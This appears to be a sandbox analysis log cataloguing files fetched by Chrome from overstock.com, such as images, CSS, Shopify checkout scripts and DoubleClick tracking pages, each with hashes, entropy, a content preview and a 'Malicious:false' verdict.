                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/files/OSTK_Icon_Favicon.svg?crop=center&height=48&v=1711043027&width=48
                                                                                                                                                          Preview:<svg xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 96 96" height="96" width="96">.<path fill="#D90023" d="M0 8C0 3.58172 3.58172 0 8 0H88C92.4183 0 96 3.58172 96 8V88C96 92.4183 92.4183 96 88 96H8C3.58172 96 0 92.4183 0 88V8Z"></path>.<path fill="white" d="M80 29.4855L63.8421 38.7427V56.6403L47.6853 66.3085L32.1579 57.2573V74.9488L47.6853 84L80 65.6915V29.4855ZM48.3147 29.6915L63.8421 38.7427V21.0512L48.3147 12L16 30.3085V66.5135L32.1568 57.2562V39.3597L48.3147 29.6915Z" clip-rule="evenodd" fill-rule="evenodd"></path>.</svg>.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):80308
                                                                                                                                                          Entropy (8bit):7.9942608807177775
                                                                                                                                                          Encrypted:true
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:35AFC9CD1848DF019E22A56C310C61CC
                                                                                                                                                          SHA1:82B79FD7CDE58DEEE861CD5B9BBCFA49E50FEE95
                                                                                                                                                          SHA-256:857EB29144A2118A2158A7996230BED144A36333BDAF646B95E78E25B0BBF8B0
                                                                                                                                                          SHA-512:DC3B601FE447954ABB5B61DBC8BFA2E5C9D3F1D88C302D48982EFE3A9DFF4BFBA5B39B0CA416336EF55788786EF38CC912303FDE82DFA39F9DDE35F39500764A
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/files/10102024-MOPS-800X800_Hero_SlashSaveEvent.jpg?v=1728572946&width=650
                                                                                                                                                          Preview:RIFF.9..WEBPVP8X....(.........ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 .7...:...*....>E..D".... (.D....nyl...Eu....i..."..r.....S.....7........5..O.?..7...o.'.{{.........{.................o......v..}K...s.g..7.7.o...?........w.?.y..............._.~.?....'................O.w.7.................q.............?......;.o...?.?........>...[.......oj.....@?........_J.-..........m...........1.....=C.g.....?...........{...[.[.o./..M~\...............x..'...>.n..../.>.>.}....?........O...............{.......].+.?.....?......'.....<.>....w........?....K...7....h_....k...;..............}......
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):235679
                                                                                                                                                          Entropy (8bit):5.195464967859856
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:D05BD7FD622B960EE42680203325379A
                                                                                                                                                          SHA1:ED0F8F089CB8034DCBB4BA4EC8E1C210BBD2B6DA
                                                                                                                                                          SHA-256:3A756BF855255435B5B4973089F0C768F448B6CD1DDFEB522893E1EBBD90C7FA
                                                                                                                                                          SHA-512:148AF2967634CC2A8550DC2E90AE12CA8EC2F3B3365DD90A4A86A8F9713F73622B043710ED02E9B5273EDB0A4954F1E9885DB4921BA561F03F36FB7E45F37964
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/assets/app.BK5OxPpc.css
                                                                                                                                                          Preview::root{--x-border-full: 1px;--x-border-block-end: 0 0 1px;--leu13r0: hsl(0, 0%, 85%);--x-border-radius-small: 3px;--x-border-radius-base: 5px;--x-border-radius-large: 10px;--x-border-radius-fully-rounded: 36px;--x-border-radius-none: 0;--x-border-width-base: 1px;--x-border-width-medium: 2px;--x-border-width-thick: 5px;--x-border-width-extra-thick: 10px}:root{--swn0j0: hsl(204, 77%, 39%);--swn0j1: hsl(0, 0%, 100%);--swn0j3: hsl(218, 100%, 99%);--swn0j4: hsl(218, 100%, 97%);--swn0j5: hsl(218, 100%, 94%);--swn0j6: hsla(204, 77%, 39%, .05);--swn0j2: hsl(204, 79%, 30%);--swn0j7: hsl(0, 0%, 0%);--swn0j8: hsl(213, 13%, 42%);--swn0j9: hsl(204, 77%, 39%);--swn0jb: hsl(204, 79%, 30%);--swn0ja: hsl(204, 79%, 30%);--swn0jc: hsl(0, 0%, 100%);--swn0jd: hsl(0, 0%, 100%);--swn0je: hsl(0, 77%, 49%);--swn0jg: hsl(0, 83%, 98%);--swn0jh: hsl(0, 89%, 96%);--swn0ji: hsl(0, 90%, 92%);--swn0jj: hsl(0, 0%, 100%);--swn0jk: hsl(0, 0%, 100%);--swn0jl: hsl(0, 77%, 49%);--swn0jf: hsl(0, 78%, 44%);--swn0jm: hsl(0, 91
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JSON data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):147
                                                                                                                                                          Entropy (8bit):4.609732504950977
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:6CBF5DFCDE3EB8CFEC3426917E42BC77
                                                                                                                                                          SHA1:4CABD614EFDBCF48EC4894230C79E58BEFC31A8D
                                                                                                                                                          SHA-256:0D130D6391BAD9292F26AD5718A132435CA0E21A53850DEE308FDAC1E2045205
                                                                                                                                                          SHA-512:B6BB63B0066A3A4CBD61578C525D20301FF2DF80A17231040CBA26321920087EA8F7805919E5909A5F9160093FFB35CA293BB2C13BE143A6D075EEFA676F2244
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:{"name":"snippet","results":[{"page_id":"40448469","rollup":{"average_rating":4.56,"rating_count":466,"review_count":466,"answered_questions":0}}]}
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 320x320, components 3
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):18140
                                                                                                                                                          Entropy (8bit):7.874142472613269
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:0090E00B69CA276C4BF5E47280B023C9
                                                                                                                                                          SHA1:4B8D3BF58ACB213723DBAB4120C655C84E6E334E
                                                                                                                                                          SHA-256:348350563EFD45FDB99F1B82E755610465E06B825051D03CBF1742FAEB018860
                                                                                                                                                          SHA-512:A98D7487D2E94687312A52C52E13B8D965330AD0900AF20077A0BD2ECEB68A9CAF76F4649472D384B301BB526F153F7061D563E2A7838941BB69E3D0B19B3BAD
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/files/nuLOOM-Casual-Braided-Anti-Fatigue-Kitchen-or-Laundry-Room-Comfort-Mat_d9355de8-0fe0-49b6-8925-14725029719d.jpg?v=1721461012&width=320
                                                                                                                                                          Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................@...........@...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......@.@....................................................................................a..u.W..+!$c..'/.I;......?K...'............^].+.....G..W..iI..z.K.;+.7...ru.........|...}.....Y...J1.......,:cNm.........Lr.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (8100), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):8100
                                                                                                                                                          Entropy (8bit):5.655753375586505
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:65DD791AC36D7FD007BCBED13F7C4B76
                                                                                                                                                          SHA1:6452CFA22BA7EE5E2E95E834EB0B1D9F0837A8B9
                                                                                                                                                          SHA-256:D7457CDDDEB100C040E27742BFD162C1E34297D8B783A87CC60FF14A6E0E4519
                                                                                                                                                          SHA-512:E9589FA76F9FB48B2E4F9AA8D9F481A15DD2D359CB3F9268786262C99AE59A10D0E980C47A57F434119A37F531C682D1E7AC85761E945EC82F67D0479EF0FD67
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://td.doubleclick.net/td/rul/11435964337?random=1729272255013&cv=11&fst=1729272255013&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4ah0v9172781734z89176705627za201zb9176705627&gcd=13l3l3l3l1l1&dma=0&tag_exp=101686685&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.overstock.com%2F&ref=https%3A%2F%2Feos.atebasyno.com%2F&top=https%3A%2F%2Fwww.overstock.com&hn=www.googleadservices.com&frm=2&tiba=Explore%20the%20New%20Overstock&npa=0&pscdl=noapi&auid=1714882903.1729272252&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dpage_viewed
                                                                                                                                                          Preview:<html><head><meta http-equiv="origin-trial" content="Avh5Ny0XEFCyQ7+oNieXskUrqY8edUzL5/XrwKlGjARQHW4TFRK+jVd5HnDIpY20n5OLHfgU4ku7x48N3uhG/A0AAABxeyJvcmlnaW4iOiJodHRwczovL2RvdWJsZWNsaWNrLm5ldDo0NDMiLCJmZWF0dXJlIjoiUHJpdmFjeVNhbmRib3hBZHNBUElzIiwiZXhwaXJ5IjoxNjk1MTY3OTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0="></head><body><script>var ig_list={"interestGroups":[{"action":0,"expirationTimeInSeconds":15552000,"interestGroupAttributes":{"owner":"https://td.doubleclick.net","name":"4s1714882903.1729272252","biddingLogicUrl":"https://td.doubleclick.net/td/bjs","dailyUpdateUrl":"https://td.doubleclick.net/td/update?ig_name=4s1714882903.1729272252\u0026ig_key=1sNHMxNzE0ODgyOTAzLjE3MjkyNzIyNTI!2sZ__nwQ!3sAAptDV7K1nmR","trustedBiddingSignalsUrl":"https://td.doubleclick.net/td/bts","trustedBiddingSignalsKeys":["1sWZ6l-g!2sZ__nwQ!3sAAptDV7K1nmR"],"userBiddingSignals":[["8605163949","8605117709","8605899945","8604992644","8605218413","8605118546","8604994774","8604357350","8526177074"],null,1729272257144174],"
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 800x232, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):53068
                                                                                                                                                          Entropy (8bit):7.965554006357915
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:7D6AA1940B42857697F4E89C421378A8
                                                                                                                                                          SHA1:FDB047BBEFEDC263379DB268C2BB4C6B27B83C8E
                                                                                                                                                          SHA-256:7FFA446F586C49852333491F00EDD9D1C51BA40667413F09CB0BD80B0C07FF38
                                                                                                                                                          SHA-512:807F20DD6166B253E7DAC4690903A533A6CCC3D79E064A9A3DD911C236EB480B0A85A35B47256868D8E30B5E39024D8D40831D10111575335DA02CF451BD2C59
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100.................... .......................ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}........ .....................................................................................{./N&)@.....................................r..w.......&...........=.n...1c.b..).-....-C.;sL{:EH/....T,N...E/ah..'...b.F...:.. V.....
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (2016)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):2017
                                                                                                                                                          Entropy (8bit):5.240604507370637
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:529AA4962F87174831E7874E0C27A0BF
                                                                                                                                                          SHA1:99E8F847531B0022F657F7CEBB08B50197867626
                                                                                                                                                          SHA-256:59F8A9ABC5676652AC08B9034624B56F7EA57CAC054BEEA05588328FDA8BA17D
                                                                                                                                                          SHA-512:FBA1C638829224AB4AEBCF16179C145A04A8A3FB5D49DBC5FEB0AC75F613EF709D18A1AC3513BF313310503268BF6046207BF83DD5983FF04013DF17E431C669
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/assets/ShopPayVerificationSwitch.DVQdwG9J.css
                                                                                                                                                          Preview:.qdHCv{position:absolute;z-index:1000;top:0;left:0}.hgqpU{position:fixed;top:0;right:0;bottom:0;left:0;z-index:1;background-color:rgba(0,0,0,.18);opacity:0;visibility:hidden;transition:opacity calc(var(--x-duration-base) * 5) cubic-bezier(.2,.9,.3,1)}.LTbS5{opacity:1;visibility:visible}.axmya{background-image:linear-gradient(180deg,rgba(0,0,0,0),rgba(0,0,0,.8) 55%)}.JHj7j{--popover-arrow-size: 2.5rem;position:relative;visibility:hidden;opacity:0;height:0;width:0;overflow:hidden;transform:scale(.1) matrix3d(1,0,0,0,0,.8,.5,-.002,0,-.4,.8,0,0,0,0,1);transition-timing-function:cubic-bezier(.2,.9,.3,1);transition-duration:var(--x-duration-base);transition-property:transform,opacity,height;transition-delay:var(--x-duration-base),var(--x-duration-base),0s}.JHj7j:after{box-shadow:0 19px 47px rgba(0,0,0,.35);content:"";z-index:-1;position:absolute;left:5%;right:5%;top:0;height:100%;width:90%;display:block}.JHj7j .hQvGd{min-width:calc(var(--popover-arrow-size) * 2)}.PMbsk:before{background-colo
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:Java source, ASCII text, with very long lines (1744)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1745
                                                                                                                                                          Entropy (8bit):5.260889546649037
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:E6A79C63825341CE92680F84227BCCC4
                                                                                                                                                          SHA1:ADF4CFCF1FD8B9292DDE1F4E1AFA4C9AA6DAF702
                                                                                                                                                          SHA-256:6BA68CC068CF0DC9711775B053D6BD8224F316659CE29F6296E373A0897D95C7
                                                                                                                                                          SHA-512:44147DC2EB7481E0B255592CC5A12B853648E622E6095E9E7DC7B24CDCE334C06DDBA3433637281BB0C27019B375944AFB663FB96C12B1477CF6E6A1565BFE6F
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/RageClickCapture.BFDgLbCX.js
                                                                                                                                                          Preview:import{ae as m,af as P,ag as h,ah as c,a as s,aa as f,ai as B,K as g,ad as x,V as y,aj as E,ak as S,al as k,t as R,A as l,H as b,am as W}from"./app.CRtF78CU.js";import{a as L}from"./MarketsProDisclaimer.BZXsgf5w.js";function V(){const[t]=m(),[n]=P({isPayWithPayPalButton:!0}),a=h(),e=c();return t.status==="error"||n.status==="error"?!1:a||e}const v="RTmkG",w="U4CmB",D="E4OHT",O="hLtvr",i={PayPalExpressButtonContainer:v,PayPalExpressButtonContainerRedesign:w,PayPalExpressButtonContainerWhenLoading:D,PayPalExpressButtonContainerWhenSpinnerDisplayed:O};function T({isLoading:t,isSpinnerDisplayed:n,children:a}){const e=B(),r=g("simulated");return s(y,{className:x(i.PayPalExpressButtonContainer,{[i.PayPalExpressButtonContainerRedesign]:e,[i.PayPalExpressButtonContainerWhenLoading]:t,[i.PayPalExpressButtonContainerWhenSpinnerDisplayed]:n}),inert:r||void 0,children:a})}function N(){const t=c(),[n]=P({isPayWithPayPalButton:!0}),a=s(y,{inlineAlignment:"center",children:s(E,{size:"large"})}),e=n.s
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):41158
                                                                                                                                                          Entropy (8bit):7.986822062411731
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:7FA10D856CD9F2DCA23E6D31FF354F3F
                                                                                                                                                          SHA1:F297680B7276DF416FDC0E72FDCE55401ABD44EE
                                                                                                                                                          SHA-256:34D31C97B9F431ADEC5C07C8C763B82F8A2947D9FDB33D0954049884313BEBFE
                                                                                                                                                          SHA-512:69B1AC1AA96C88E6DE239E63F8BA8B9CD17BBF063AF8959B3E49D4CAE9389BC1DF431A9180925A6E5186313B3759597C6E08E8E91350EE941DA78590B869002B
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/files/10142024-MOPS-A2_Desktop.jpg?v=1728929399&width=650
                                                                                                                                                          Preview:RIFF....WEBPVP8X....(......m..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 .........*..n.>9..C.!...U. .....d1..+q~..'....:7.?................}?....%.?o..;.o....l.......W.....?...|....o......?.........../...?x_...}..5...........?.?.}..a.?............c...=....e.......'...........~.}..+.......7........@?....D........^......~D.......?....'b..=D~......?l.......{.w......s....p_.?..........U.?.....{........C.s...#........./......._......o.....v.[...G.....<.?C.o...../...?......s...7............g.w..O..........{.......~..x?....j....n.".kl...-.|[f....m...7.o.l...-.|[f....m...7.o.l...-.|@.v.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (61316)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):61494
                                                                                                                                                          Entropy (8bit):5.509260975716244
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:79E70BF63CEB05863DB4B5DE6CE39D61
                                                                                                                                                          SHA1:78CBE4B94D317FD2E28C18AEC7A8829F4B3DABA1
                                                                                                                                                          SHA-256:C92B8990E37110E8BF15D501BA0F681833C35F3678B168EED7A8FA541ACF9DE7
                                                                                                                                                          SHA-512:8285CA242EF23FCB7559E4188FE4B634077AB68C4276BCA10D0DA86BD95051D39FE3A7DE2A67D23B76084B3F09B5E387143C2F1E01622A437C19B682E089784E
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/wpm@8688a91bwbd065f36p51297ecfmc385dee2/web-pixel-401408159@15f94c63ac240451a21402457105dac1/sandbox/worker.modern.js
                                                                                                                                                          Preview:(()=>{var e={3482:function(e,t,r){var n,i,o;!function(a,s){"use strict";i=[r(3550)],void 0===(o="function"==typeof(n=function(e){var t=/(^|@)\S+:\d+/,r=/^\s*at .*(\S+:\d+|\(native\))/m,n=/^(eval@)?(\[native code])?$/;return{parse:function(e){if(void 0!==e.stacktrace||void 0!==e["opera#sourceloc"])return this.parseOpera(e);if(e.stack&&e.stack.match(r))return this.parseV8OrIE(e);if(e.stack)return this.parseFFOrSafari(e);throw new Error("Cannot parse given Error object")},extractLocation:function(e){if(-1===e.indexOf(":"))return[e];var t=/(.+?)(?::(\d+))?(?::(\d+))?$/.exec(e.replace(/[()]/g,""));return[t[1],t[2]||void 0,t[3]||void 0]},parseV8OrIE:function(t){return t.stack.split("\n").filter((function(e){return!!e.match(r)}),this).map((function(t){t.indexOf("(eval ")>-1&&(t=t.replace(/eval code/g,"eval").replace(/(\(eval at [^()]*)|(,.*$)/g,""));var r=t.replace(/^\s+/,"").replace(/\(eval code/g,"(").replace(/^.*?\s+/,""),n=r.match(/ (\(.+\)$)/);r=n?r.replace(n[0],""):r;var i=this.extractL
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1137
                                                                                                                                                          Entropy (8bit):4.654337825373563
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:20E4FDC570020F91BFA67D1B7832F9A3
                                                                                                                                                          SHA1:3D0CF86EFB752478AA3625E06BCAC88B95611193
                                                                                                                                                          SHA-256:EBFD57EE8E5A78156E3DBFF30A6291FD0980AFE61E037CF644A6CC1464D9F3CA
                                                                                                                                                          SHA-512:216936DD1D355DAA0D7F707DD60E0011C942AFE4BF022493783EB4881AD9D3D114F6FA29CB3D4AE9B25BF9494DF22D14F0B9AA77AC1048D6C1715F5B0417C12D
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://ak1.ostkcdn.com/img/mxc/star-half.svg
                                                                                                                                                          Preview:<svg width="14" height="14" viewBox="0 0 14 14" fill="none" xmlns="http://www.w3.org/2000/svg">.<g clip-path="url(#clip0_35_680)">.<path d="M5.4365 4.77644L7 0.965174L8.5635 4.77644C8.66194 5.01641 8.88513 5.19598 9.159 5.22265L13.1482 5.61105L10.1207 8.40306C9.92635 8.58228 9.84785 8.84948 9.90151 9.0994L10.7802 13.192L7.37658 11.0705C7.1456 10.9265 6.8544 10.9265 6.62342 11.0705L3.21981 13.192L4.09849 9.09941C4.15215 8.84948 4.07365 8.58228 3.87932 8.40306L0.851766 5.61105L4.84099 5.22265C5.11487 5.19598 5.33806 5.01641 5.4365 4.77644Z" stroke="#2F3337"/>.<path d="M6.99999 11.4757V0C6.91165 0 6.82331 0.0502178 6.7821 0.150522L4.97103 4.56483C4.94921 4.61794 4.91096 4.6604 4.86389 4.68656C4.83675 4.70155 4.80664 4.71114 4.77503 4.71417L0.215652 5.15811C0.00833908 5.17822 -0.0754012 5.4489 0.0809709 5.59311L3.52103 8.76512C3.5863 8.82533 3.61495 8.91801 3.59589 9.007L2.58917 13.6955C2.54335 13.9086 2.7627 14.076 2.94168 13.9644L6.87885 11.5105C6.91619 11.4873 6.95806 11.4757 6.99999 11
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (801), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):801
                                                                                                                                                          Entropy (8bit):5.636496245855168
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:85A0B39B8FA5B970179166B77ABC784D
                                                                                                                                                          SHA1:8237AD288AF8AAA0BF2642DB970F734F11B9A84C
                                                                                                                                                          SHA-256:0F33E8D7EFAFDD12375A7FF61EA28633EABA6ACFAE78F49AED6ED96ACDDD1878
                                                                                                                                                          SHA-512:E72551196F1791F51ADFBB902EDF1B1185455FD03C9F4DD1A45E70DD1B31EDE163EC19C528961053CD815C159EBB079CE8CF990457D52C2570D56376FECDD768
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://14698185.fls.doubleclick.net/activityi;dc_pre=CMO255S5mIkDFcmW_QcddqMZGg;src=14698185;type=overs0;cat=allsi0;ord=1;num=3350742580016;npa=0;auiddc=1714882903.1729272252;ps=1;pcor=865959874;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=1;gtm=45fe4ah0v9189675736z89176705627za201zb9176705627;gcd=13l3l3l3l1l1;dma=0;tag_exp=101533422~101686685;epver=2;~oref=https%3A%2F%2Fwww.overstock.com%2Fwpm%408688a91bwbd065f36p51297ecfmc385dee2%2Fcustom%2Fweb-pixel-17006751%4079%2Fsandbox%2Fmodern%2F?
                                                                                                                                                          Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><img src="https://adservice.google.com/ddm/fls/z/dc_pre=CMO255S5mIkDFcmW_QcddqMZGg;src=14698185;type=overs0;cat=allsi0;ord=1;num=3350742580016;npa=0;auiddc=*;ps=1;pcor=865959874;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=1;gtm=45fe4ah0v9189675736z89176705627za201zb9176705627;gcd=13l3l3l3l1l1;dma=0;tag_exp=101533422~101686685;epver=2;~oref=https%3A%2F%2Fwww.overstock.com%2Fwpm%408688a91bwbd065f36p51297ecfmc385dee2%2Fcustom%2Fweb-pixel-17006751%4079%2Fsandbox%2Fmodern%2F"/></body></html>
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1033
                                                                                                                                                          Entropy (8bit):4.9055749198625
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:8360EB270B919A1FB4776BC448D9ED14
                                                                                                                                                          SHA1:C0D249A8D232C6A98326C1AEC0F0B38991ED77B0
                                                                                                                                                          SHA-256:E92913C2B11FC1E9E7C4F84628362D1C9660E7F7E88904D124C9EBBBEF9D4E48
                                                                                                                                                          SHA-512:AEECC427FAE194F0BFCCCC864867AC16B2BADD3814B76806D7D899B07B6D8D394A838D56A1EB4F637D1DB1B2AC8D34588E4AA7453D00492F3C5EFDEC89B0BE63
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://use.fontawesome.com/7f85a56ba4.css
                                                                                                                                                          Preview:/*!. * Font Awesome v4.7.0 by @davegandy - http://fontawesome.io - @fontawesome. * License - http://fontawesome.io/license (Font: SIL OFL 1.1, CSS: MIT License). */.@import url('//use.fontawesome.com/releases/v4.7.0/css/font-awesome-css.min.css');./* FONT PATH. * -------------------------- */.@font-face {. font-family: 'FontAwesome';. src: url('//use.fontawesome.com/releases/v4.7.0/fonts/fontawesome-webfont.eot');. src: url('//use.fontawesome.com/releases/v4.7.0/fonts/fontawesome-webfont.eot?#iefix') format('embedded-opentype'),. url('//use.fontawesome.com/releases/v4.7.0/fonts/fontawesome-webfont.woff2') format('woff2'),. url('//use.fontawesome.com/releases/v4.7.0/fonts/fontawesome-webfont.woff') format('woff'),. url('//use.fontawesome.com/releases/v4.7.0/fonts/fontawesome-webfont.ttf') format('truetype'),. url('//use.fontawesome.com/releases/v4.7.0/fonts/fontawesome-webfont.svg#fontawesomeregular') format('svg');. font-weight: normal;. font-style: norma
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (4904)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):5000
                                                                                                                                                          Entropy (8bit):4.975925082760953
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:4B32273CD85724C4936F7E280092523B
                                                                                                                                                          SHA1:CD08559036EC6B02C46E7599B518B2A3FFB89CF4
                                                                                                                                                          SHA-256:0CA622703826E53C9B1EBA69563E64C9C2FB141C2DF2EE1B0B814A3DC25F16E8
                                                                                                                                                          SHA-512:92C0C5C9BC9C77E248EA7EEB8F0ED56728CADE6648346F3B8B0C8E6564709756364E903286A7A755091706CD2CCE1826939745FB463E748694F13561D5F7AF04
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/t/211/assets/footer.css?v=109542107773651875661729142870
